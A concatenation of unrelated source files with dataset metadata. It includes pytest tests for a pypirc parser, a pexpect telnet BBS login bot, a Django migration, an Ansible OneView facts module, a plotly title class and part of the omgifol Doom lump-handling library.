best_score = results[metric]
return best_file_name, best_score
| 43.22 | 111 | 0.701527 |
4a1e3dd16d61b3810a629f1fd8bfdf19b93ba52f | 4,563 | py | Python | tests/test_pypirc.py | bibby/pypi-uploader | 2adbe84542042d479618e5d6bc55a4453fda7d0a | [
"MIT"
] | null | null | null | tests/test_pypirc.py | bibby/pypi-uploader | 2adbe84542042d479618e5d6bc55a4453fda7d0a | [
"MIT"
] | 1 | 2019-10-24T16:57:02.000Z | 2019-10-28T15:03:43.000Z | tests/test_pypirc.py | bibby/pypi-uploader | 2adbe84542042d479618e5d6bc55a4453fda7d0a | [
"MIT"
] | 1 | 2018-12-19T18:35:51.000Z | 2018-12-19T18:35:51.000Z | """Tests for :mod:`pypiuploader.pypirc`."""
try:
import configparser
except ImportError:
import ConfigParser as configparser
import io
import tempfile
import types
import pytest
from pypiuploader import exceptions
from pypiuploader import pypirc
from . import utils
def test_read_config():
"""Test :class:`pypiuploader.pypirc.read_config`."""
tmpfile = utils._make_tmp_pypirc_file()
config = pypirc.read_config(tmpfile.name)
assert isinstance(config, configparser.ConfigParser)
sections = sorted(config.sections())
assert sections == ['distutils', 'external', 'internal', 'pypi']
class TestRCParser(object):
"""Tests for :class:`pypiuploader.pypirc.RCParser`."""
def test_from_file(self):
tmpfile = utils._make_tmp_pypirc_file()
parser = pypirc.RCParser.from_file(tmpfile.name)
assert isinstance(parser.config, configparser.ConfigParser)
sections = sorted(parser.config.sections())
assert sections == ['distutils', 'external', 'internal', 'pypi']
def test_from_file_when_pypirc_does_not_exist(self):
tmpfile = tempfile.NamedTemporaryFile()
tmpfile.close()
with pytest.raises(exceptions.ConfigFileError) as exc:
pypirc.RCParser.from_file(tmpfile.name)
assert tmpfile.name in str(exc.value)
def test_read_index_servers(self):
parser = self._make_parser()
servers = parser._read_index_servers()
assert isinstance(servers, types.GeneratorType)
assert list(servers) == ['internal', 'external']
def test_read_index_servers_when_no_distutils_section(self):
parser = self._make_parser(b'')
servers = parser._read_index_servers()
assert isinstance(servers, types.GeneratorType)
assert list(servers) == []
def test_read_index_servers_when_no_index_servers(self):
parser = self._make_parser(b'[distutils]\n')
with pytest.raises(configparser.NoOptionError):
list(parser._read_index_servers())
def test_read_server_auth(self):
parser = self._make_parser()
auth = parser._read_server_auth('internal')
assert auth == ('bar', 'foo')
def test_read_server_auth_without_password(self):
parser = self._make_parser()
auth = parser._read_server_auth('external')
assert auth == ('baz', None)
def test_find_repo_config_not_found(self):
parser = self._make_parser()
servers = ['internal', 'external']
repo_config = parser._find_repo_config(servers, 'foo')
assert repo_config is None
def test_find_repo_config_by_server_name(self):
parser = self._make_parser()
servers = ['internal', 'external']
repo_config = parser._find_repo_config(servers, 'internal')
expected_config = {
'repository': 'http://127.0.0.1:8000',
'username': 'bar',
'password': 'foo',
}
assert repo_config == expected_config
def test_find_repo_config_by_repository(self):
parser = self._make_parser()
servers = ['internal', 'external']
repo_config = parser._find_repo_config(servers, 'https://foo.bar.com/')
expected_config = {
'repository': 'https://foo.bar.com/',
'username': 'baz',
'password': None,
}
assert repo_config == expected_config
def test_get_repository_config(self):
parser = self._make_parser()
repo_config = parser.get_repository_config('internal')
expected_config = {
'repository': 'http://127.0.0.1:8000',
'username': 'bar',
'password': 'foo',
}
assert repo_config == expected_config
def test_get_repository_config_when_no_distutils_section(self):
parser = self._make_parser(b'')
repo_config = parser.get_repository_config('internal')
assert repo_config is None
def test_get_repository_config_when_no_repository_section(self):
parser = self._make_parser(
b'[distutils]\n'
b'index-servers = internal'
)
with pytest.raises(configparser.NoSectionError):
parser.get_repository_config('internal')
def _make_parser(self, content=None):
if content is None:
content = utils.PYPIRC
config_buffer = io.StringIO(content.decode())
config = configparser.ConfigParser()
config.readfp(config_buffer)
parser = pypirc.RCParser(config)
return parser
| 31.6875 | 79 | 0.656147 |
4a1e3dd980592dc1142988e581b8b077dab317c7 | 2,641 | py | Python | sweng/proto/stateexpect.py | AlwaysTraining/bbot | 0b907a426db89b9862b68e0af0894f4ee683ee2d | [
"MIT"
] | null | null | null | sweng/proto/stateexpect.py | AlwaysTraining/bbot | 0b907a426db89b9862b68e0af0894f4ee683ee2d | [
"MIT"
] | null | null | null | sweng/proto/stateexpect.py | AlwaysTraining/bbot | 0b907a426db89b9862b68e0af0894f4ee683ee2d | [
"MIT"
] | null | null | null |
import pexpect
import sys
import time
import os
switch_ip_address = "shenks.synchro.net"
print 'ip address is: ', switch_ip_address
t = pexpect.spawn('telnet ' + switch_ip_address,logfile=sys.stdout)
t.delaybeforesend=1
class state:
def __init__(self):
pass
def get_tokens(self):
return []
def parse_token(self,tok):
return self
class seedo(state):
def __init__(self, toks, response, nstate):
self.toks = toks
self.nstate = nstate
self.response = response
def get_tokens(self):
return self.toks
def parse_token(self,tok):
t.sendline(self.response)
return self.nstate
class pressenter(seedo):
def __init__(self, nextstate):
seedo.__init__(self,
['[Hit a key]','Enter number of bulletin to view or press (ENTER) to continue:'],
'\r',
nextstate)
class pressn(seedo):
def __init__(self, nextstate):
seedo.__init__(self,
['Search all groups for new messages?','Search all groups for un-read messages to you'],
'n',
nextstate)
class mmenu(state):
def get_tokens(self):
return ['...External programs','AFTERSHOCK:']
def parse_token(self,tok):
if tok == 0:
print 'i^&^&matched to:', tok, t.after
self.val = t.after[0]
return self
elif tok == 1:
print 'i^&^&sending ' , self.val
t.sendline(self.val+'\r')
# get access to text here
return None
class password(state):
def get_tokens(self):
return ['Password: ']
def parse_token(self,tok):
t.sendline('RANDYPAS\r')
return pressenter(pressenter(pressn(pressn(mmenu()))))
class username(state):
def get_tokens(self):
return ['Login: ']
def parse_token(self, which):
t.sendline('Randy32\r')
return password()
def next_state(t, curstate):
which_token = t.expect(curstate.get_tokens())
return curstate.parse_token(which_token)
state = username()
while state is not None:
state = next_state(t, state)
"""
t.expect('Login: ')
t.sendline('Randy32\r')
t.expect('Password: ')
t.sendline('RANDYPAS\r')
t.expect_exact('[Hit a key]')
t.sendline('\r')
t.expect_exact('Enter number of bulletin to view or press (ENTER) to continue:')
t.sendline('\r')
t.expect_exact('Search all groups for new messages?')
t.sendline('n')
t.expect_exact('Search all groups for un-read messages to you')
t.sendline('n')
t.expect('AFTERSHOCK:')
t.sendline('\/o')
"""
t.expect('zzzzzzsads232e1fd2312')
| 22.767241 | 104 | 0.615297 |
4a1e3dea150468b22591d06c8acfc694868cede1 | 512 | py | Python | alienspoilers/subs/migrations/0009_auto_20150223_2311.py | astonshane/Alien-Spoilers | a84c2eff921bc260f192085129c6891d38594926 | [
"MIT"
] | null | null | null | alienspoilers/subs/migrations/0009_auto_20150223_2311.py | astonshane/Alien-Spoilers | a84c2eff921bc260f192085129c6891d38594926 | [
"MIT"
] | 1 | 2015-04-12T20:17:46.000Z | 2015-04-12T20:17:46.000Z | alienspoilers/subs/migrations/0009_auto_20150223_2311.py | astonshane/Alien-Spoilers | a84c2eff921bc260f192085129c6891d38594926 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('subs', '0008_auto_20150223_2218'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='user',
field=models.OneToOneField(related_name='profile', to=settings.AUTH_USER_MODEL),
preserve_default=True,
),
]
| 23.272727 | 92 | 0.638672 |
4a1e3e429be6cd06ca0680362f2ddc546e70e4a9 | 6,254 | py | Python | library/oneview_server_profile_template_facts.py | soodpr/oneview-ansible | f4f07062eda3f6dc17f4c306f376ddebb7313fbb | [
"Apache-2.0"
] | null | null | null | library/oneview_server_profile_template_facts.py | soodpr/oneview-ansible | f4f07062eda3f6dc17f4c306f376ddebb7313fbb | [
"Apache-2.0"
] | null | null | null | library/oneview_server_profile_template_facts.py | soodpr/oneview-ansible | f4f07062eda3f6dc17f4c306f376ddebb7313fbb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2020) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: oneview_server_profile_template_facts
short_description: Retrieve facts about the Server Profile Templates from OneView.
description:
- Retrieve facts about the Server Profile Templates from OneView.
version_added: "2.3"
requirements:
- "python >= 2.7.9"
- "hpOneView >= 5.0.0"
author: "Bruno Souza (@bsouza)"
options:
name:
description:
- Server Profile Template name.
uri:
description:
- Server Profile Template uri.
options:
description:
- "List with options to gather additional facts about Server Profile Template resources.
Options allowed: C(new_profile), C(transformation) and C(available_networks)."
notes:
- The option C(transformation) is only available for API version 300 or later.
- The option C(available_networks) is only available for API version 600 or later.
extends_documentation_fragment:
- oneview
- oneview.factsparams
'''
EXAMPLES = '''
- name: Gather facts about all Server Profile Templates
oneview_server_profile_template_facts:
config: "{{ config }}"
- debug: var=server_profile_templates
- name: Gather paginated, filtered and sorted facts about Server Profile Templates
oneview_server_profile_template_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
params:
start: 0
count: 3
sort: name:ascending
filter: macType='Virtual'
scope_uris: /rest/scopes/af62ae65-06b2-4aaf-94d3-6a92562888cf
delegate_to: localhost
- debug: var=server_profile_templates
- name: Gather facts about a Server Profile Template by name
oneview_server_profile_template_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
name: "ProfileTemplate101"
- name: Gather facts about a Server Profile by uri
oneview_server_profile_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
uri: /rest/server-profile-templates/c0868397-eff6-49ed-8151-4338702792d3
delegate_to: localhost
- name: Gather facts about a template and a profile with the configuration based on this template
oneview_server_profile_template_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
name: "ProfileTemplate101"
options:
- new_profile
- name: Gather facts about available networks.
oneview_server_profile_template_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
options:
- available_networks:
serverHardwareTypeUri: "/rest/server-hardware-types/253F1D49-0FEE-4DCD-B14C-B26234E9D414"
enclosureGroupUri: "/rest/enclosure-groups/293e8efe-c6b1-4783-bf88-2d35a8e49071"
delegate_to: localhost
'''
RETURN = '''
server_profile_templates:
description: Has all the OneView facts about the Server Profile Templates.
returned: Always, but can be null.
type: dict
new_profile:
description: A profile object with the configuration based on this template.
returned: When requested, but can be null.
type: dict
server_profile_template_available_networks:
description: Has all the facts about the list of Ethernet networks, Fibre Channel networks and network sets that
are available to the server profile along with their respective ports.
returned: When requested, but can be null.
type: dict
'''
from ansible.module_utils.oneview import OneViewModule
class ServerProfileTemplateFactsModule(OneViewModule):
argument_spec = dict(
name=dict(type='str'),
options=dict(type='list'),
params=dict(type='dict'),
uri=dict(type='str')
)
def __init__(self):
super(ServerProfileTemplateFactsModule, self).__init__(additional_arg_spec=self.argument_spec)
self.set_resource_object(self.oneview_client.server_profile_templates)
def execute_module(self):
name = self.module.params.get("name")
uri = self.module.params.get("uri")
if name or uri:
facts = self.__get_options(name, uri)
elif self.options and self.options.get("available_networks"):
network_params = self.options["available_networks"]
facts = {"server_profile_template_available_networks": self.resource_client.get_available_networks(**network_params)}
else:
facts = self.__get_all()
return dict(changed=False, ansible_facts=facts)
def __get_options(self, name, uri):
if not self.current_resource:
return dict(server_profile_templates=[])
facts = dict(server_profile_templates=[self.current_resource.data])
if self.options:
if "new_profile" in self.options:
facts["new_profile"] = self.current_resource.get_new_profile()
if "transformation" in self.options:
tranformation_data = self.options.get('transformation')
facts["transformation"] = self.current_resource.get_transformation(**tranformation_data)
return facts
def __get_all(self):
templates = self.resource_client.get_all(**self.facts_params)
return dict(server_profile_templates=templates)
def main():
ServerProfileTemplateFactsModule().run()
if __name__ == '__main__':
main()
| 32.572917 | 129 | 0.712504 |
4a1e3e995f0b2f8cac292df77867cb37ac4ac1f7 | 6,596 | py | Python | env/lib/python3.8/site-packages/plotly/graph_objs/carpet/aaxis/_title.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 11,750 | 2015-10-12T07:03:39.000Z | 2022-03-31T20:43:15.000Z | env/lib/python3.8/site-packages/plotly/graph_objs/carpet/aaxis/_title.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 2,951 | 2015-10-12T00:41:25.000Z | 2022-03-31T22:19:26.000Z | env/lib/python3.8/site-packages/plotly/graph_objs/carpet/aaxis/_title.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 2,623 | 2015-10-15T14:40:27.000Z | 2022-03-28T16:05:50.000Z | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "carpet.aaxis"
_path_str = "carpet.aaxis.title"
_valid_props = {"font", "offset", "text"}
# font
# ----
@property
def font(self):
"""
Sets this axis' title font. Note that the title's font used to
be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.carpet.aaxis.title.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.carpet.aaxis.title.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# offset
# ------
@property
def offset(self):
"""
An additional amount by which to offset the title from the tick
labels, given in pixels. Note that this used to be set by the
now deprecated `titleoffset` attribute.
The 'offset' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["offset"]
@offset.setter
def offset(self, val):
self["offset"] = val
# text
# ----
@property
def text(self):
"""
Sets the title of this axis. Note that before the existence of
`title.text`, the title's contents used to be defined as the
`title` attribute itself. This behavior has been deprecated.
The 'text' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["text"]
@text.setter
def text(self, val):
self["text"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
font
Sets this axis' title font. Note that the title's font
used to be set by the now deprecated `titlefont`
attribute.
offset
An additional amount by which to offset the title from
the tick labels, given in pixels. Note that this used
to be set by the now deprecated `titleoffset`
attribute.
text
Sets the title of this axis. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
"""
def __init__(self, arg=None, font=None, offset=None, text=None, **kwargs):
"""
Construct a new Title object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.carpet.aaxis.Title`
font
Sets this axis' title font. Note that the title's font
used to be set by the now deprecated `titlefont`
attribute.
offset
An additional amount by which to offset the title from
the tick labels, given in pixels. Note that this used
to be set by the now deprecated `titleoffset`
attribute.
text
Sets the title of this axis. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
Returns
-------
Title
"""
super(Title, self).__init__("title")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.carpet.aaxis.Title
constructor must be a dict or
an instance of :class:`plotly.graph_objs.carpet.aaxis.Title`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("font", None)
_v = font if font is not None else _v
if _v is not None:
self["font"] = _v
_v = arg.pop("offset", None)
_v = offset if offset is not None else _v
if _v is not None:
self["offset"] = _v
_v = arg.pop("text", None)
_v = text if text is not None else _v
if _v is not None:
self["text"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 32.333333 | 82 | 0.535476 |
4a1e4094a0880d8af24f95f088063e362ebbed08 | 24,507 | py | Python | omg/lump.py | Xymph/omgifol | 0c8001dae2bff00824ecd49343ba9ae21066e2b2 | [
"MIT"
] | null | null | null | omg/lump.py | Xymph/omgifol | 0c8001dae2bff00824ecd49343ba9ae21066e2b2 | [
"MIT"
] | null | null | null | omg/lump.py | Xymph/omgifol | 0c8001dae2bff00824ecd49343ba9ae21066e2b2 | [
"MIT"
] | null | null | null | # Import the Python Imaging Library if it is available. On error, ignore
# the problem and continue. PIL being absent should only affect the
# graphic lump loading/saving methods and the user may not be interested
# in installing PIL just to pass this line if not interested in using the
# graphics functionality at all.
try:
from PIL import Image, ImageDraw, ImageOps
except:
pass
# Import PySoundFile for sound file loading/saving. Equally optional.
try:
from soundfile import SoundFile, check_format
import numpy as np
except:
pass
import os
import omg.palette
from omg.util import *
class Lump(object):
"""Basic lump class. Instances of Lump (and its subclasses)
always have the following:
.data -- a bytes object holding the lump's data
.from_file -- load the data to a file
.to_file -- save the data to a file
The default Lump class merely copies the raw data when
loading/saving to files, but subclasses may convert data
appropriately (for example, Graphic supports various image
formats)."""
def __init__(self, data=None, from_file=None):
"""Create a new instance. The `data` parameter may be a string
representing data for the lump. The `source` parameter may be
a path to a file or a file-like object to load from."""
self.data = bytes()
if issubclass(type(data), Lump):
self.data = data.data
elif data is not None:
self.data = data or bytes()
if from_file:
self.from_file(from_file)
def from_file(self, source):
"""Load data from a file. Source may be a path name string
or a file-like object (with a `write` method)."""
self.data = readfile(source)
def to_file(self, target):
"""Write data to a file. Target may be a path name string
or a file-like object (with a `write` method)."""
writefile(target, self.data)
def copy(self):
return deepcopy(self)
class Music(Lump):
"""Subclass of Lump, for music lumps. Not yet implemented."""
pass
class Sound(Lump):
"""Subclass of Lump, for Doom format sounds. Supports
conversion from/to RAWs (sequences of bytes), as well as
saving to/loading from various file formats (via PySoundFile).
Useful attributes:
.format -- DMX sound format
.length -- (in frames/samples)
.sample_rate --
.midi_bank -- MIDI patch bank (format 1/2 only)
.midi_patch -- MIDI patch number (format 1/2 only)
Possible values for the 'format' attribute:
0: PC speaker sound
Raw data consists of values 0-127 corresponding to pitch.
Sample rate is fixed at 140Hz.
1: MIDI sound sequence
Raw data consists of MIDI note and pitch bend info.
Sample rate is fixed at 140Hz.
2: MIDI note
Raw data consists of a single MIDI note.
Sample rate is undefined. Length is MIDI note length.
3: Digitized sound (default)
Raw data is 8-bit unsigned PCM.
Sample rate defaults to 11025 Hz, but can be changed.
Only format 3 can be exported to an audio file.
"""
def __init__(self, data=None, from_file=None):
Lump.__init__(self, data, from_file)
# default to an empty digitized sound effect if no data loaded
try:
if self.format is None:
self.format = 3
except TypeError:
pass
def get_format(self):
"""Retrieve the format of the sound."""
if len(self.data) < 2:
format = None
else:
format = unpack('<H', self.data[0:2])[0]
if format > 3:
raise TypeError("Unknown or invalid sound format")
return format
def set_format(self, format):
"""Change the format of the sound.
Warning: Changing a sound's format will erase any existing sound data!"""
try:
if format == self.format:
return # don't do anything if format is the same as before
except TypeError:
pass
if format == 0:
# PC speaker sound
self.data = pack('<HH', format, 0)
elif format == 1:
# MIDI sequence
self.data = pack('<HHHH', format, 0, 0, 0)
elif format == 2:
# single MIDI note
self.data = pack('<HHHHH', format, 0, 0, 0, 0)
elif format == 3:
# digitized sound
self.data = pack("<HHI32x", format, 11025, 32)
else:
raise ValueError("Unknown or invalid sound format")
format = property(get_format, set_format)
def get_length(self):
"""Retrieve the length of the sound."""
format = self.format
if format == 0 or format == 1:
# PC speaker or MIDI sequence
return unpack('<H', self.data[2:4])[0]
elif format == 2:
# single MIDI note
return unpack('<H', self.data[8:10])[0]
elif format == 3:
# digitized sound
return unpack('<I', self.data[4:8])[0] - 32
def set_length(self, length):
"""Set the length of the sound. This will make the lump larger or smaller."""
format = self.format
if length < 0 or length > 65535:
raise ValueError("sound effect length must be between 0-65535")
if format == 2:
# single MIDI note
self.data = self.data[:8] + pack('<H', length)
else:
# grow or shrink existing raw data to new size
self.from_raw(self.to_raw()[0:length] + b'\0'*(length - self.length))
length = property(get_length, set_length)
def get_sample_rate(self):
"""Retrieve the sample rate of the sound. Only useful for digitized sounds."""
format = self.format
if format == 0 or format == 1:
# PC speaker or MIDI sequence
return 140
elif format == 2:
# single MIDI note
return 0
elif format == 3:
# digitized sound
return unpack('<H', self.data[2:4])[0]
def set_sample_rate(self, sample_rate):
"""Set the sample rate of the sound. Only supported for digitized sounds."""
format = self.format
if format == 3:
# digitized sound
self.data = self.data[:2] + pack('<H', sample_rate) + self.data[4:]
else:
raise TypeError("set_sample_rate only supported for digitized sounds (format 3)")
sample_rate = property(get_sample_rate, set_sample_rate)
def get_midi_bank(self):
"""Retrieve the MIDI bank of the sound. Only useful for MIDI sounds."""
format = self.format
if format == 1:
# MIDI sequence
return unpack('<H', self.data[4:6])[0]
elif format == 2:
# single MIDI note
return unpack('<H', self.data[2:4])[0]
def set_midi_bank(self, bank):
"""Set the MIDI bank of the sound. Only supported for MIDI sounds."""
format = self.format
if format == 1:
# MIDI sequence
self.data = self.data[:4] + pack('<H', bank) + self.data[6:]
elif format == 2:
# single MIDI note
self.data = self.data[:2] + pack('<H', bank) + self.data[4:]
else:
raise TypeError("only supported for MIDI sounds (format 1 or 2)")
midi_bank = property(get_midi_bank, set_midi_bank)
def get_midi_patch(self):
"""Retrieve the MIDI patch of the sound. Only useful for MIDI sounds."""
format = self.format
if format == 1:
# MIDI sequence
return unpack('<H', self.data[6:8])[0]
elif format == 2:
# single MIDI note
return unpack('<H', self.data[4:6])[0]
def set_midi_patch(self, patch):
"""Set the MIDI patch of the sound. Only supported for MIDI sounds."""
format = self.format
if format == 1:
# MIDI sequence
self.data = self.data[:6] + pack('<H', patch) + self.data[8:]
elif format == 2:
# single MIDI note
self.data = self.data[:4] + pack('<H', patch) + self.data[6:]
else:
raise TypeError("only supported for MIDI sounds (format 1 or 2)")
midi_patch = property(get_midi_patch, set_midi_patch)
def from_raw(self, data, format=None, sample_rate=None):
"""Replaces the raw values making up the sound.
If 'format' or 'sample_rate' are not specified, the existing values
will be used.
The expected values depend on the value of 'format'.
For format 2, 'data' is expected to be an int.
Otherwise it is expected to be a byte string.
"""
if isinstance(data, bytes):
length = len(data)
if length < 0 or length > 65535:
raise ValueError("sound effect length must be between 0-65535")
# optionally change format if needed
if format is None:
format = self.format
else:
self.format = format
if format == 0:
# PC speaker sound
self.data = self.data[:2] + pack('<H', len(data)) + data
elif format == 1:
# MIDI sequence
self.data = self.data[:2] + pack('<H', len(data)) + self.data[4:8] + data
elif format == 2:
# single MIDI note
self.data = self.data[:6] + pack('<H', data) + self.data[8:]
elif format == 3:
# digitized sound
self.data = self.data[:4] + pack('<I', 32 + len(data)) \
+ b'\0'*16 + data + b'\0'*16
if sample_rate is not None:
self.sample_rate = sample_rate
else:
raise ValueError("Unknown or invalid sound format")
def to_raw(self):
"""Returns the raw values making up the sound as a byte string.
The resulting values depend on the value of 'format'.
For format 2, the value is returned an int.
Otherwise the data is returned as a byte string.
"""
format = self.format
if format == 0:
# PC speaker
return self.data[4:]
elif format == 1:
# MIDI sequence
return self.data[8:]
elif format == 2:
# single MIDI note
return unpack('<H', self.data[6:8])[0]
elif format == 3:
# digitized sound
return self.data[24:-16]
def from_file(self, filename):
"""Load sound from an audio file."""
if filename[-4:].lower() == '.lmp':
self.data = readfile(filename)
else:
with SoundFile(filename) as file:
# get sound data and convert to 8-bit unsigned mono
sound = (file.read(dtype='int16') >> 8) + 128
if file.channels > 1:
sound = np.mean(sound, axis=1)
# create new format 3 sound
self.from_raw(sound.astype('uint8').tobytes(), 3, file.samplerate)
def to_file(self, filename, subtype='PCM_U8'):
"""Save the sound to an audio file.
The output format is selected based on the filename extension.
For example, "file.wav" saves to WAV format. If the file has
no extension, WAV format is used.
See the PySoundFile documentation for possible values of 'subtype'.
Possible values depend on the output format; if the given value is
not supported, the format's default will be used.
Special cases: ".lmp" saves the raw lump data, and ".raw" saves
the raw sound data.
"""
format = os.path.splitext(filename)[1][1:].upper() or 'WAV'
if format == 'LMP': writefile(filename, self.data)
elif format == 'RAW': writefile(filename, self.to_raw())
elif self.format == 3:
if check_format(format, subtype): pass
elif check_format(format, 'PCM_U8'): subtype = 'PCM_U8'
elif check_format(format, 'PCM_S8'): subtype = 'PCM_S8'
else: subtype = None # use default for format
with SoundFile(filename, 'w', self.sample_rate, 1, subtype, format=format) as file:
# convert to signed 16-bit (since SoundFile doesn't directly support 8-bit input)
# the result will just be converted back in the file though
sound = (np.frombuffer(self.to_raw(), dtype='uint8').astype('int16') - 128) << 8
file.write(sound)
else:
raise TypeError("audio file export only supported for digitized sounds (format 3)")
class Graphic(Lump):
"""Subclass of Lump, for Doom format graphics. Supports
conversion from/to RAWs (sequences of bytes) and PIL
Image objects, as well as saving to/loading from various
file formats (via PIL).
Useful attributes:
.dimensions -- (width, height)
.width -- width of the image
.height -- height of the image
.x_offset -- x offset
.y_offset -- y offset
"""
def __init__(self, data=None, from_file=None, palette=None):
self.palette = palette or omg.palette.default
Lump.__init__(self, data, from_file)
def get_offsets(self):
"""Retrieve the (x, y) offsets of the graphic."""
return unpack('<hh', self.data[4:8])
def set_offsets(self, xy):
"""Set the (x, y) offsets of the graphic."""
self.data = self.data[:4] + pack('<hh', *xy) + self.data[8:]
def get_dimensions(self):
"""Retrieve the (width, height) dimensions of the graphic."""
return unpack('<hh', self.data[0:4])
offsets = property(get_offsets, set_offsets)
x_offset = property(lambda self: self.offsets[0],
lambda self, x: self.set_offsets((x, self.y_offset)))
y_offset = property(lambda self: self.offsets[1],
lambda self, y: self.set_offsets((self.x_offset, y)))
dimensions = property(get_dimensions)
width = property(lambda self: self.dimensions[0])
height = property(lambda self: self.dimensions[1])
def from_pixels(self, data, width, height, x_offset=0, y_offset=0):
"""Load a list of 8bpp pixels.
Pixels with value None are transparent."""
if min(width, height) < 0 or max(width, height) > 32767:
raise ValueError("image width and height must be between 0-32767")
# First pass: extract pixel data in column+post format
columns_in = [data[n:width*height:width] for n in range(width)]
columns_out = []
for column in columns_in:
# Find the y position where each chunk starts
start_rows = []
postdata = []
in_trans = True
tall = False
offset = 0
for y in range(height):
# split at 128 for vanilla-compatible images without premature tiling
if height < 256:
if y == 128:
in_trans = True
# for tall patch support
elif offset == 254:
in_trans = True
tall = True
# dummy post
start_rows.append(254)
postdata.append(bytearray())
# start relative offsets
offset = 0
if column[y] is None:
in_trans = True
else:
if in_trans:
# start a new post
start_rows.append(offset)
postdata.append(bytearray())
in_trans = False
if tall:
# reset relative offset for tall patches
offset = 0
postdata[-1].append(column[y])
offset += 1
columns_out.append(zip(start_rows, postdata))
# Second pass: compile column+post data, adding pointers
data = []
columnptrs = []
pointer = 4*width + 8
for column in columns_out:
columnptrs.append(pack('<i', pointer))
for row, pixels in column:
data.append(b"%c%c\x00%s\x00" % (row, len(pixels), pixels))
pointer += 4 + len(pixels)
data.append(b'\xff')
pointer += 1
# Merge everything together
self.data = bytes().join([pack('4h', width, height, x_offset, y_offset),
bytes().join(columnptrs), bytes().join(data)])
def from_raw(self, data, width, height, x_offset=0, y_offset=0, pal=None):
"""Load a raw 8-bpp image, converting to the Doom picture format
(used by all graphics except flats)."""
pal = pal or omg.palette.default
pixels = [i if i != pal.tran_index else None for i in data]
self.from_pixels(pixels, width, height, x_offset, y_offset)
def to_pixels(self):
"""Returns self converted to a list of 8bpp pixels.
Pixels with value None are transparent."""
data = self.data
width, height = self.dimensions
output = [None] * (width*height)
pointers = unpack('<%il'%width, data[8 : 8 + width*4])
for x in range(width):
y = -1
pointer = pointers[x]
if pointer >= len(data):
continue
while data[pointer] != 0xff:
offset = data[pointer]
if offset <= y:
y += offset # for tall patches
else:
y = offset
post_length = data[pointer + 1]
op = y*width + x
for p in range(pointer + 3, pointer + post_length + 3):
if op >= len(output) or p >= len(data):
break
output[op] = data[p]
op += width
pointer += post_length + 4
return output
def to_raw(self, tran_index=None):
"""Returns self converted to a raw (8-bpp) image.
`tran_index` specifies the palette index to use for
transparent pixels. The value defaults to that of the
Graphic object's palette instance.
"""
tran_index = tran_index or self.palette.tran_index
output = [i if i is not None else tran_index for i in self.to_pixels()]
return bytes(bytearray(output))
def to_Image(self, mode='P'):
"""Convert to a PIL Image instance."""
if mode != 'RGBA' or isinstance(self, Flat):
# target image has no alpha,
# or source image is a flat (which has no transparent pixels)
im = Image.new('P', self.dimensions, None)
if isinstance(self, Flat):
im.frombytes(self.data)
else:
im.frombytes(self.to_raw())
im.putpalette(self.palette.save_bytes)
return im.convert(mode)
else:
# target image is RGBA and source image is not a flat
im = Image.new('RGBA', self.dimensions, None)
data = bytes().join([self.palette.bytes[i*3:i*3+3] + b'\xff' if i is not None \
else b'\0\0\0\0' for i in self.to_pixels()])
